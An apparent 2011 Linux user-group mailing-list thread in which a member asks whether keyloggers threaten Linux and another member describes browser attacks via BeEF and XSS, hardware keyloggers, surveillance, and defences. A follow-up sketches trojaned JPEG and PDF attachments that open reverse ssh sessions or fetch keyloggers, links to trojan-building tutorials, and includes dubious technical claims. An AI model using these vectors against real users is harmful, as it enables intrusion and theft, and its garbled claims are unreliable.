Mike: More to make the post complete with all available attack vectors that could be deployed to install a keylogger on Linux (MAC and Windows):
On Thu, Jun 30, 2011 at 2:09 PM, mike enriquez <myli...@cox.net> wrote: > ** > On 06/30/2011 06:55 AM, Lisa Kachold wrote: > > Hi Mike! > > On Wed, Jun 29, 2011 at 5:09 PM, mike enriquez <myli...@cox.net> wrote: > >> Does anyone on the List know if Key Loggers are a problem in Linux? >> I don't know a thing about them. My windows computers get the things all >> the time. >> Do I need to worry about them in Linux. >> Thanks for any comments. >> > > Unlike Windows, where the attack vector is mainly virus from file > transfers, in Linux (and Mac) the attack vector is going to be browser > based. > > So if you don't limit javascript trust, you can fall victim to any manner > of installations, ssh, or infestations from browser based attacks like > BEef <http://linux.softpedia.com/get/Internet/HTTP-WWW-/BeEF-29854.shtml>. > This tool will provide a triangulated Host --> Website --> YourBrowser > attack similar to XSS scripting browser attacks, that opens your entire > linux (or Mac) system to full control via the Browser (Opera/FireFox/etc). > A keylogger like the one referenced by Sam would trivially be installed > without your immediate knowledge. > > Of course if you do not properly firewall your home network, have a "cable > modem" that is subject to hacked firmware, or take your laptop to public > venues without a proper analysis of open ports or iptables, you can always > pick up a "hitcher", who could install a key logger or other hack. > > Various hardware hacks also exist, similar to tiny USB devices that can be > setup on your keyboard or monitor between connections, which are commonly > used by IT managers in NOCs and Operations Centers (where oblivious > Operations and Systems staff continue to surf Facebook rather than actually > work). > > Regularly reading the logs, setting up reporting devices that inform of new > files or packages and of course watching packet traffic by port on a regular > basis will assist you to identify keyloggers, as well as BEef and XSS > browser hacks, since you will clearly see a great deal of nepharious > traffic. > > Of course if you allow 3rd Party Cookies and don't control Javascript, you > are just laying on a large number of "adware" and other installations that > create traffic. Be sure you use NoScript or another Javascript trust > control plugin at the browser level. > > It is recommended that ANY systems user always have a fairly realistic > understanding of network trust, packet ports and "regular traffic". > > Also, beyond KEYLOGGERS, everyone needs to know that EVERY SINGLE SITE YOU > GOOGLE, every place you visit can trivially be cross referenced from other > sites for which you authenticate to provide AT A GLANCE NSA and DHS data > that will provide a complete profile. This includes CHAT LOGS, Warez sites, > TORRENT, and porn sites. > The false sense of security that you can use a Anonymizer or browser Proxy > site, while it will allow you get to FaceBook from work, will not protect > you from large scale data taps at the level of Akamai Caching and > Cable/Telecom providers which can be configured to hit any number of > parameters for which the feds are interested. > > > Also, if you download FULL email messages, including PDF attachments, (which you open without updating your Adobe Browser Plugin or other applications for all known exploits) and JPEGs (executable files which I can trivially [bind to an .exe file for Win7 powershell fun] or include Unicode UTF or BOM characters that can and will setup cron jobs (to open a reverse ssh session to my hacked server at a certain time of night for instance) or wget a keylogger [since this is the subject we are discussing here in this PLUG post] when "opened") you are opening new attack vectors for Linux (or even specifically addressed to you by an associate) [an excellent reason to obfuscate your "real identity" at 2600 Club meetings....]. References: http://xahlee.org/comp/unicode_BOM_byte_orde_mark.html http://www.hackingethics.com/blog/2008/07/22/how-to-convert-exe-files-to-jpg/ http://justhackitnow.blogspot.com/2011/02/hide-multiple-files-into-single-jpg.html http://www.dirtyservices.com/2010/how-to-create-adobe-acrobat-pdf-exploit-trojan/ > >> Mike Enriquez >> --------------------------------------------------- >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> To subscribe, unsubscribe, or to change your mail settings: >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> > > > > -- > (602) 791-8002 Android > (623) 239-3392 Skype > (623) 688-3392 Google Voice > ** > HomeSmartInternational.com <http://www.homesmartinternational.com> > > Thank you Lisa, > I love this group. > Every time I ask a question I get an education. > Take Care. > Mike > > > > > > > > > > > > > > > > --------------------------------------------------- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail > settings:http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > --------------------------------------------------- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- (602) 791-8002 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** HomeSmartInternational.com <http://www.homesmartinternational.com>
--------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
